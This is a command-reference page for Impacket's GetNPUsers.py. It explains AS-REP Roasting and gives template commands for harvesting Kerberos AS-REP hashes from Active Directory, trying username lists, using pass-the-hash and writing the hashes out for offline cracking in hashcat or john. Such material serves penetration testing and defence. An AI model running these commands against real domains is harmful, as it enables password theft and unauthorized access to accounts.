← 返回命令列表

Linux command

getnpusers.py 命令

文件

复制后可按需替换文件名、目录或参数。

常用示例

Query domain users

GetNPUsers.py [DOMAIN]/[username]:[password] -request -format hashcat -outputfile [hashes.txt]

Check specific users

GetNPUsers.py [DOMAIN]/ -usersfile [users.txt] -format hashcat -outputfile [hashes.txt] -dc-ip [DC_IP]

Request TGT for a specific user

GetNPUsers.py [DOMAIN]/[username] -no-pass -dc-ip [DC_IP]

Use pass-the-hash

GetNPUsers.py [DOMAIN]/[username] -hashes [LMhash]:[NThash] -request

Output in John format

GetNPUsers.py [DOMAIN]/[username]:[password] -request -format john

说明

GetNPUsers.py is an Impacket tool that identifies Active Directory users with Kerberos pre-authentication disabled and retrieves their AS-REP (Authentication Service Response) encrypted data. This data can be cracked offline to recover user passwords, an attack known as AS-REP Roasting. When pre-authentication is disabled for a user, anyone can request a TGT on their behalf without knowing the password. The domain controller returns encrypted data using the user's password hash, which can be brute-forced offline. The tool can query all domain users via LDAP (requires credentials) or check specific usernames from a file (no credentials required if usernames are known).

参数

-request
Request TGT for users found with pre-auth disabled.
-format _FORMAT_
Output format for hashes: hashcat or john.
-outputfile _FILE_
Write AS-REP hashes to specified file.
-usersfile _FILE_
File containing list of usernames to check.
-dc-ip _IP_
IP address of the domain controller.
-no-pass
Use empty password or no password.
-hashes _LMHASH_:_NTHASH_
Use NTLM hash for pass-the-hash authentication.
-k
Use Kerberos authentication from ccache (set KRB5CCNAME).
-debug
Enable debug output.

FAQ

What is the getnpusers.py command used for?

GetNPUsers.py is an Impacket tool that identifies Active Directory users with Kerberos pre-authentication disabled and retrieves their AS-REP (Authentication Service Response) encrypted data. This data can be cracked offline to recover user passwords, an attack known as AS-REP Roasting. When pre-authentication is disabled for a user, anyone can request a TGT on their behalf without knowing the password. The domain controller returns encrypted data using the user's password hash, which can be brute-forced offline. The tool can query all domain users via LDAP (requires credentials) or check specific usernames from a file (no credentials required if usernames are known).

How do I run a basic getnpusers.py example?

Run `GetNPUsers.py [DOMAIN]/[username]:[password] -request -format hashcat -outputfile [hashes.txt]` in a terminal, then adjust file names, paths, flags, or remote targets for your system.

What does -request do in getnpusers.py?

Request TGT for users found with pre-auth disabled.